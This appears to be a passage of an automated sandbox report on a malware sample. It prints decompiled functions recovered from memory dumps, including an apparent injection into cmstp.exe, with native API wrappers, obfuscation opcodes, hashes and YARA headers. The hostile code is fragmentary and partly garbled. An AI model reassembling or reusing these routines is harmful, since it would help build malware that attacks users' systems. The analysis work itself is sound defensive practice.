NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 19
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E7A(void* __eax, void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, void* _a8) {
				long _t11;

				_t18 = __edi - __ebx;
				_t8 = _a4;
				_t3 = _t8 + 0x10; // 0x300
				_t4 = _t8 + 0xc50; // 0x40a913
				E0041A950(_t18, _a4, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}

0x00419e7c
0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 43048c3b82e7265a8fa305c34cb80db818e440d1896384eac4ccebf256efdb41
Instruction ID: 033337fa82fcdd7cca45ed2abae3070c80d87cc72efa358882833b3c814e4ac4
Opcode Fuzzy Hash: 43048c3b82e7265a8fa305c34cb80db818e440d1896384eac4ccebf256efdb41
Instruction Fuzzy Hash: 04D02BBA5093C04FC711FF78E8D50C2BF40EE912283154ACED4A807607C575E25AD791

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a8b
0x00409a93
0x00409a95
0x00409a9a
0x00409a9f
0x00409ab2
0x00409ab7
0x00409ac0
0x00409acc
0x00409adf
0x00409ae4
0x00409ae7
0x00409af0
0x00409b02
0x00409b07
0x00409b0c
0x00000000
0x00000000
0x00409b0e
0x00409b12
0x00000000
0x00000000
0x00409b14
0x00000000
0x00409b12
0x00409b16
0x00409b19
0x00409b1f
0x00409b21
0x00409b2c
0x00409b31
0x00409b34
0x00409b41
0x00409b4c
0x00409b4e
0x00409b54
0x00409b58
0x00409b5b
0x00409b5b
0x00409b62
0x00409b65
0x00409b6a
0x00409b77
0x00409aa6
0x00409aa6
0x00409aa6

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x0041a037
0x0041a03c
0x0041a04d
0x0041a051

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004082E8(signed int __ebx, void* __edi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				void* _t38;

				asm("into");
				 *(__edi + 0x7a917dc3) =  *(__edi + 0x7a917dc3) ^ __ebx;
				asm("adc byte [ebp-0x75], 0xec");
				_t31 = _t33;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t14 = E0040ACC0(_t38, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E10(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_push(__edi);
					_t23 = _a8;
					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t28(_t23, 0x8003, _t31 + (E0040A450(_t40, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x004082e8
0x004082e9
0x004082ef
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833c
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 62af9d2b5774bcb475bdad36167cf5ae37fe97bd52a01ae6414af8588cd0097f
Instruction ID: 1a50fab3de168b541f9be6b92667cf551030bdf7cd7f3faa6fef0408a3a09855
Opcode Fuzzy Hash: 62af9d2b5774bcb475bdad36167cf5ae37fe97bd52a01ae6414af8588cd0097f
Instruction Fuzzy Hash: 4401DD31A403187AE720A6658C43FFF776CAB40F54F04411DFE04BA1C1D7A8691547E5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACB3, Relevance: 1.6, APIs: 1, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040ACB3(void* __eax, void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4) {
				long _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v540;
				void* __ebp;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t27;

				_t17 = __eax;
				_t27 = __ebx -  *((intOrPtr*)(__edi - 0x40));
				_push(__esi);
				asm("in eax, 0xf5");
				if(_t27 <= 0) {
					if(_t27 > 0) {
						_t18 = __edi;
						_t20 = __esi - 1;
						do {
							 *_t18 =  *_t18 +  *((intOrPtr*)(_t18 + 1));
							_t18 = _t18 + 1;
							_t20 = _t20 - 1;
						} while (_t20 != 0);
					}
					return _t17;
				} else {
					__al = __al & 0x000000c6;
					asm("cmpsb");
					asm("loop 0x57");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x214;
					__eax =  &_v540;
					_v12 =  &_v540;
					__eax = E0041C640( &_v16, 0x104, _a4);
					__eflags = __eax;
					if(__eflags != 0) {
						__eax = _v8;
						__eax = E0041CA60(__eflags, _v8);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = E0041CCE0( &_v12, 0);
						}
						__eax = E0041AE90(_v8);
						_v16 = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							 &_v16 =  *((intOrPtr*)(_a4 + 8));
							__eax = LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
							__eax = _v16;
						}
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					}
				}
			}

0x0040acb3
0x0040acb3
0x0040acb7
0x0040acb8
0x0040acba
0x0040ac9f
0x0040aca1
0x0040aca3
0x0040aca6
0x0040aca9
0x0040acab
0x0040acac
0x0040acac
0x0040aca6
0x0040acb2
0x0040acbc
0x0040acbc
0x0040acbe
0x0040acbf
0x0040acc0
0x0040acc1
0x0040acc3
0x0040acd0
0x0040acdc
0x0040acdf
0x0040ace7
0x0040ace9
0x0040acef
0x0040acf3
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad27
0x0040ad32
0x0040ad34
0x0040ad34
0x0040ad37
0x0040ad39
0x0040ad3a
0x0040aceb
0x0040aceb
0x0040aced
0x0040acee
0x0040acee
0x0040ace9

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd47a1a79cf1dc94395daf415c6d23ac362df56765bcb1d94ed9b2174d1852d
Instruction ID: 552c51e9d061692b28bb8c5ca02deb34540cda2e3cbd3b081cc8e6aaf93ab217
Opcode Fuzzy Hash: 8dd47a1a79cf1dc94395daf415c6d23ac362df56765bcb1d94ed9b2174d1852d
Instruction Fuzzy Hash: DE012871A0420EABEF10DBA4D845FEDB7749F54309F0081AAE908DB381F135DA69C782

Uniqueness

Uniqueness Score: -1.00%

Function 0041A053, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041A053(void* __ecx, signed int __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				signed int _v117;
				char _t14;
				void* _t21;

				asm("invalid");
				 *(__ecx - 0x38819176) =  *(__ecx - 0x38819176) | 0x27a11a6f;
				_v117 = _v117 ^ __edx;
				_t11 = _a4;
				_t7 = _t11 + 0xc74; // 0xc74
				E0041A950(_t21, _a4, _t7,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}

0x0041a053
0x0041a055
0x0041a05f
0x0041a063
0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dffb22ff3197997899396547239ab340009ce782ab1b5751c2ca2a5d6de7dfab
Instruction ID: b4dd2e3f4e82aba4d8dedd4259a9032312f9627ab020f140ce78d933bc1cfabd
Opcode Fuzzy Hash: dffb22ff3197997899396547239ab340009ce782ab1b5751c2ca2a5d6de7dfab
Instruction Fuzzy Hash: 75E06DB1600205AFD718DFA5CC49EEB7BA8EF84350F11855AF91EA7251C631E950CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A093, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d5f1c98369c83a07db6039abb74d3e3471ec6e572a8c1987fa4cf7e895f59d66
Instruction ID: 0987a670003d0fdaedb32cccb39eba0b62fb44353ff35fa168597188e495188b
Opcode Fuzzy Hash: d5f1c98369c83a07db6039abb74d3e3471ec6e572a8c1987fa4cf7e895f59d66
Instruction Fuzzy Hash: DEE092307552506FD720CF288C85FC77F68AF45350F1544ADB8986F182C630BA54CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1F5, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8e802d41bfc7b95f8eda50d691a041bdc6939079d756ebb008feac0eb42ef5ee
Instruction ID: b4b6ba8331c7a7a888b6fc3e97199983aa7e8a2edc33a9f493ccd200930d6b3b
Opcode Fuzzy Hash: 8e802d41bfc7b95f8eda50d691a041bdc6939079d756ebb008feac0eb42ef5ee
Instruction Fuzzy Hash: 90D0C7B02052402BCB00EF29EC40CAB3B28EFC2268B008A4BFC0C83202C134C8208AF6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: cmstp.exe PID: 6400 Parent PID: 3292 cmstp.exeCOMMON

Executed Functions

Function 00699D4A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKi,007A002E,00000000,00000060,00000000,00000000), ref: 00699D9D

Strings

wKi, xrefs: 00699D6C, 00699D78
.z`, xrefs: 00699D8D, 00699D98

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wKi
API String ID: 823142352-1751698907
Opcode ID: 87843e676d6b05da7ec541852862a20c2d68ff7b5063ba7122622bba5cf8a904
Instruction ID: 572abd67faa086b9a170e191743a2dc0469ef28040ccc4c115ab9e46826e2f59
Opcode Fuzzy Hash: 87843e676d6b05da7ec541852862a20c2d68ff7b5063ba7122622bba5cf8a904
Instruction Fuzzy Hash: BD01D2B2200108AFCB58CF98C891EEB77A9AF8C340F118208FA1DD3241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00699D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKi,007A002E,00000000,00000060,00000000,00000000), ref: 00699D9D

Strings

wKi, xrefs: 00699D6C, 00699D78
.z`, xrefs: 00699D8D, 00699D98

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wKi
API String ID: 823142352-1751698907
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 44a8ed98a0f5efe681f9200ead665f76fabc16711a2b5c576d6dab129c3fc6c1
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 13F0BDB2210208AFCB48CF88DC95EEB77EDAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00699DFA, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,006949F1,?,?,?,?,006949F1,FFFFFFFF,?,2Mi,?,00000000), ref: 00699E45

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9546a7e0d675664ee63da5d3768227ddd514562b4af110178fc6c67096ce420e
Instruction ID: 1411260ee7bd25aa365c9b712188b57e7403683b1bb21d4d06173de5084db3cb
Opcode Fuzzy Hash: 9546a7e0d675664ee63da5d3768227ddd514562b4af110178fc6c67096ce420e
Instruction Fuzzy Hash: EDF0F9B6200108AFCB04DF89CC91EEB77ADAF8C354F068248BE1D97251C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00699E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,006949F1,?,?,?,?,006949F1,FFFFFFFF,?,2Mi,?,00000000), ref: 00699E45

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 4c70a864c58b777ec005cc880afb78d9ab3058b742ae65123adbaa44e110e8b3
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 37F0A4B2210208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00699F2A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00682D11,00002000,00003000,00000004), ref: 00699F69

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 79cfae37a97210c58bf3385e6a6e41562c865dec121284ca6393ecff2caf29b2
Instruction ID: 628959051270cdd75cbde3278d8372cc81d7b6fdd6cdfe5e2ed4f893b541df0c
Opcode Fuzzy Hash: 79cfae37a97210c58bf3385e6a6e41562c865dec121284ca6393ecff2caf29b2
Instruction Fuzzy Hash: 1DF0F8B1210208AFDB14DF89CC81EA777ADAF88650F118149BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00699F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00682D11,00002000,00003000,00000004), ref: 00699F69

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: ac7b6717b51e12e663ad2e2fcf9deb25c0f6dcdef4393b142cb7996fe1bb1ea6
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: FAF015B2210208AFCB14DF89CC81EAB77ADAF88750F118148BE1897241C630F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00699E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00694D10,?,?,00694D10,00000000,FFFFFFFF), ref: 00699EA5

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: a12692cdf4c4354dfa167d7a9066981ab3597f48b3f06da86eaf4e49275b263f
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5ED01776200214ABDB10EBD8CC86EA77BADEF48760F154499BA5C9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00699E7A, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00694D10,?,?,00694D10,00000000,FFFFFFFF), ref: 00699EA5

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c856b946ee1b5c10b0c7e1ec521385dfc9f1a7da2bd76d7d3f6805aa71768724
Instruction ID: a134a15182a44a5510c85065124e7aafc30ef44ef8f4ab2b68923933c325735c
Opcode Fuzzy Hash: c856b946ee1b5c10b0c7e1ec521385dfc9f1a7da2bd76d7d3f6805aa71768724
Instruction Fuzzy Hash: 4CD02BBA5093C04FCB11FFB8E8D50C2BF81FE912183154ACDD4A847607C571E20AD791

Uniqueness

Uniqueness Score: -1.00%

Function 04639860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463986A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c47a8e0cc2197031f71dade0b3fc3778244aac5b7fc2fd1bc324bc83f82fb13
Instruction ID: b1e5f83f11b3b1a55e06d7ccbdd9b5698986c640b6b903ab565bdcbfdc59f0d0
Opcode Fuzzy Hash: 1c47a8e0cc2197031f71dade0b3fc3778244aac5b7fc2fd1bc324bc83f82fb13
Instruction Fuzzy Hash: 2E9002B170100413F61165594505707000D97D0285F91C412A0415598DA696D952B161

Uniqueness

Uniqueness Score: -1.00%

